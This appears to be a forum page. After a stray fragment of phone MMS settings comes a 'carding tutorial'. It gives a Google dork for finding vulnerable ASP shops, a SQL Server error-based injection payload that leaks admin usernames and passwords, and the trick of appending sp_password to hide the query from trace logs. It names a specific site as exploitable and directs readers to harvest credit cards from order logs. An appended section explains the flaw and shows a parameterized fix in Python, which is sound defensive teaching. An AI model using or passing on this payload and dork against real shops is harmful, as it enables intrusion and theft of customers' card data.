- Def. duration: 010.0
- Retrieval: Automatic
- MMS Relaysrv.: http://mms.telkomsel.com
- IP Settings: 010.001.089.150
Port: 9201
2nd port and 2nd address can be left empty
- Conn. profile: select MMS Telkomsel
7. Done
Post by : Siemens on [ 24 October 2005 11:23:47 ]
Carding tutorial
Carding Tutorial by god_army
Here I want to share a little tutorial on carding using a script that exploits websites which are still vulnerable to the script I made.
Actually the script can still be modified to suit your needs, but that is up to you... hehe.
The first step is to find a target website that we want to test for vulnerability; we search on Google with the keyword:
/shop/shopdisplayproducts.asp or
shopdisplayproducts.asp
Once we have a website to use as a target, we try this script --> ?cat='%20and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
For example, say we have the target www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui
Then we put the script after shopdisplayproducts.asp, so it becomes:
www.masih-vuln.com/shopdisplayproducts.asp?cat='%20and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
So what happens...? Nothing happens; instead we get
The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
--------------------------------------------------------------------------------
If that happens, it means that website cannot be hit with this script; look for another one.
If the website is still vulnerable, the admin's username and password will appear; once we have them we just log in with the username and password we found.
As an example of a website that is still vulnerable:
http://www.ilovesport.com.au so it becomes:
http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat='%20and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
And what comes out is the admin's username and password; after that we just log in with that username and password at
http://www.ilovesport.com.au/shop/admin.asp
hehehehe... heheheheh
it worked, right...
after that go into the order log and look for the credit cards there.
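The payload in the post above is error-based SQL injection against a classic ASP page that concatenates the cat= parameter straight into its query: the leading ' closes the string literal, convert(int, ...) makes SQL Server raise a conversion error whose message contains the selected fldusername/fldpassword string (that error page is what the post calls the username and password "coming out"), and -- comments out the rest of the original statement. The trailing sp_password is appended because SQL Server's trace replaces the text of any statement containing that token with a comment, so the injected query does not show up in Profiler output. As an added example, not code from the post or from the application it targets, the following Python puts the concatenation pattern beside the parameterized form, using an in-memory SQLite database with an assumed schema (the post only names tbluser.fldusername and tbluser.fldpassword). The post's payload is reused as-is, which SQLite rejects because convert() and TOP are SQL Server syntax, and a second payload adapts the same mechanism to SQLite so the effect of the breakout is visible.

```python
import sqlite3
from urllib.parse import unquote

# The cat= value from the post, still URL-encoded as it travels in the request
# (%20 = space, %2b = '+', SQL Server's string concatenation operator).
POST_PAYLOAD = ("'%20and%201=convert(int,(select%20top%201%20fldusername%2b'/'"
                "%2bfldpassword%20from%20tbluser))--sp_password")

# The same mechanism in SQLite syntax (convert() and TOP do not exist there): the quote
# closes the literal, a subquery against tbluser runs, and -- discards the rest of the
# statement. This adaptation is the example's own, not from the post.
SQLITE_PAYLOAD = "' or 1=(select count(*) from tbluser)--"


def decode_payload(encoded):
    """URL-decode the parameter the way the ASP page sees it before building its query."""
    return unquote(encoded)


def make_db():
    """Constructed in-memory stand-in for the shop database. The schema is an assumption
    made only to run the example; the post names just tbluser.fldusername/fldpassword."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, category TEXT, name TEXT);
        INSERT INTO products VALUES (1, 'shoes', 'Runner'), (2, 'shoes', 'Trainer'),
                                    (3, 'balls', 'Football');
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT);
        INSERT INTO tbluser VALUES ('admin', 'hunter2');
    """)
    return con


def vulnerable_lookup(con, cat):
    """The pattern behind shopdisplayproducts.asp: the parameter is pasted into the SQL
    text, so whatever it contains is parsed as part of the statement."""
    sql = "SELECT name FROM products WHERE category = '" + cat + "' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def run_vulnerable(con, cat):
    """Run vulnerable_lookup and report ('rows', [...]) or ('error', message).
    On SQL Server the error text for the post's payload carries the selected row."""
    try:
        return ("rows", vulnerable_lookup(con, cat))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def safe_lookup(con, cat):
    """Hardened form: the value is bound as a parameter and never reaches the SQL parser,
    so a quote or comment marker in it is just data."""
    rows = con.execute("SELECT name FROM products WHERE category = ? ORDER BY id", (cat,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    con = make_db()
    print(run_vulnerable(con, decode_payload(POST_PAYLOAD)))
    print(run_vulnerable(con, SQLITE_PAYLOAD))
    print(safe_lookup(con, SQLITE_PAYLOAD))
```

With the vulnerable function the attacker's text is parsed as SQL: the post's payload produces a syntax error on SQLite (on SQL Server it would run and leak the row), and the SQLite-syntax variant returns every product because the subquery against tbluser made the WHERE clause true. With the parameterized function both payloads simply match no category. On the server side, the same request is also easy to spot in IIS logs: a cat= value containing a quote, convert(int and -- is not something a shop link ever generates.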